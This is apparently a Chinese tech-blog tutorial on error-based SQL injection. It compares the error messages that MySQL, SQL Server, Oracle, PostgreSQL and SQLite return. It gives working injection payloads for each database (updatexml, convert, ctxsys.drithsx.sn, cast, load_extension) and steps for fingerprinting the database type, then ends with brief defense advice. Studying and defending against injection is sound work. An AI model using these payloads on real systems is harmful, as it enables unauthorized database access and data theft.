当前位置: 首页 > news >正文

不同数据库的注入报错信息

news 来源:原创 2025/5/10 10:49:47

不同数据库在报错注入时返回的报错信息具有显著差异,了解这些差异可以帮助快速判断数据库类型并构造针对性的注入攻击语句。以下是主流数据库的典型报错模式及对比:

目录

​​

1. MySQL​​

​​2. Microsoft SQL Server​​

​​3. Oracle​​

​​4. PostgreSQL​​

​​5. SQLite​​

​​对比表​​

​​实战应用:通过报错快速判断数据库类型​​

​​防御建议​​

1. MySQL​

​报错特征​​:

  • 关键词"You have an error in your SQL syntax"
  • 错误中包含near关键字(显示错误位置)。
  • 使用特定函数触发报错(如extractvalueupdatexml)。

​示例​​:

' AND updatexml(1,concat(0x7e,version()),0) --+

​错误信息​​:

XPATH syntax error: '~5.7.38-log'

​其他特征​​:

  • 错误代码以1064开头(语法错误通用代码)。
  • 默认关闭详细错误(需配置display_errors=On才会显示完整信息)。

​2. Microsoft SQL Server​

​报错特征​​:

  • 关键词"Conversion failed""Incorrect syntax"
  • 错误信息格式清晰,明确提示数据类型或语法问题。
  • 错误代码前缀为Msg 245Msg 8114等(不同代码代表不同问题)。

​示例​​:

' AND 1=convert(int,@@version) --+

​错误信息​​:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2019...' to data type int.

​其他特征​​:

  • 可利用错误堆栈信息泄露敏感数据(如error=后的内容)。

​3. Oracle​

​报错特征​​:

  • 标准错误前缀"ORA-xxxxx"(如ORA-01756)。
  • 错误信息直接提示具体问题(如quoted string not properly terminated)。
  • 依赖精度或类型转换错误触发信息泄露。

​示例​​:

' AND 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1)) --+

​错误信息​​:

ORA-20000: Oracle Database 19c Enterprise Edition...

​其他特征​​:

  • 系统视图如v$versionuser_tables常用于泄露信息。
  • 报错空间限制较严格(需通过substr()分段获取数据)。

​4. PostgreSQL​

​报错特征​​:

  • 关键词"ERROR:"开头,错误信息简洁。
  • 类型转换或函数参数不匹配时触发详细报错。
  • 错误代码格式如22P02(无效文本表示)。

​示例​​:

' AND 1=cast(version() as int) --+

​错误信息​​:

ERROR: invalid input syntax for integer: "PostgreSQL 14.4..."

​其他特征​​:

  • 可利用pg_read_file等函数泄露文件内容。

​5. SQLite​

​报错特征​​:

  • 错误信息较简洁,格式为"Error: near ...: syntax error"
  • 错误可能提示未找到表名或列名。

​示例​​:

' AND 1=load_extension(0,char(116,101,115,116)) --+

​错误信息​​:

Error: not authorized to use function: load_extension

​对比表​

数据库典型报错触发方式错误前缀或关键词示例函数/句法
​MySQL​XPATH函数、除零错误syntax error + nearupdatexmlextractvalue
​SQL Server​类型转换(如convertMsg 8114Conversion failedconvert(int,@@version)
​Oracle​精度错误或虚拟表访问ORA-xxxxxctxsys.drithsx.sn()
​PostgreSQL​类型转换(如castERROR: + 错误代码(如22P02cast(version() as int)
​SQLite​未授权函数调用Error: near ...load_extension()

​实战应用:通过报错快速判断数据库类型​

  1. ​触发一个可控错误​​:
    输入 ' AND 1=invalid_func(1) --
    观察错误信息:

    • XPATH错误 → ​​MySQL​
    • invalid functionMsg → ​​SQL Server​
    • ORA-00904 → ​​Oracle​
    • ERROR: function invalid_func → ​​PostgreSQL​

  2. ​校验函数是否存在​​:
    探测数据库特有函数(如Oracle的dbms_xmlgen.getxml):

    ' AND dbms_xmlgen.getxml('select 1 from dual')=1 --+

​防御建议​

  1. ​关闭详细错误​​:禁止返回数据库原始错误信息(显示统一提示页面)。
  2. ​参数化查询​​:使用预编译语句(如PreparedStatement)。
  3. ​权限控制​​:数据库账号仅授予最低权限。

通过结合错误特征和数据库特有函数,可以快速定位目标数据库类型,并调整攻击策略(如改用特定于该数据库的注入手法)。

相关文章:

  • ubuntu 2204 安装 vcs 2018
  • L1-5 吉老师的回归
  • Python赋能量子计算:算法创新与应用拓展
  • 浏览器发起调用到服务器的全过程解析
  • Mybatis的简单介绍
  • 记一次Agora-RTSALite编译遇到的问题
  • SuperPoint论文及源码解读
  • 使用Lombok无法生成Getter()与Setter()和toString()方法的解决方案
  • RocketMQ 中 DefaultMessageStore 的 AllocateMappedFileService 属性详解
  • 【Linux】Linux 权限:数字背后的神秘 “门禁卡” 系统
  • 剖析Spring中的设计模式(一) | 工厂观察者
  • 【零基础玩转多模态AI:Gemma3 27B开源视觉模型本地部署与远程访问】
  • 全星APQP软件:为用户提供高效、合规、便捷的研发管理体验
  • HDLBIT知识点
  • 探索 Vue 3 响应式系统:原理与实践
  • 蓝桥杯电子赛_E2PROM(AT24C02)
  • Agent 2 Agent VS MCP
  • 【C++】深拷贝与浅拷贝
  • GitHub 趋势日报 (2025年04月08日)
  • C语言精讲-12
  • 国办印发《关于进一步加强困境儿童福利保障工作的意见》
  • 2025中国南昌国际龙舟赛5月23日启幕,是历年来南昌举办的最高规格龙舟赛事
  • 第32届梅花奖终评启幕,上海京剧院《智取威虎山》满堂彩
  • 最快3天开通一条定制公交线路!上海推出服务平台更快响应市民需求
  • 上交现场配乐4K修复版《神女》:默片巅峰有了新的打开方式
  • 马上评|不再提“智驾”,新能源车企回归理性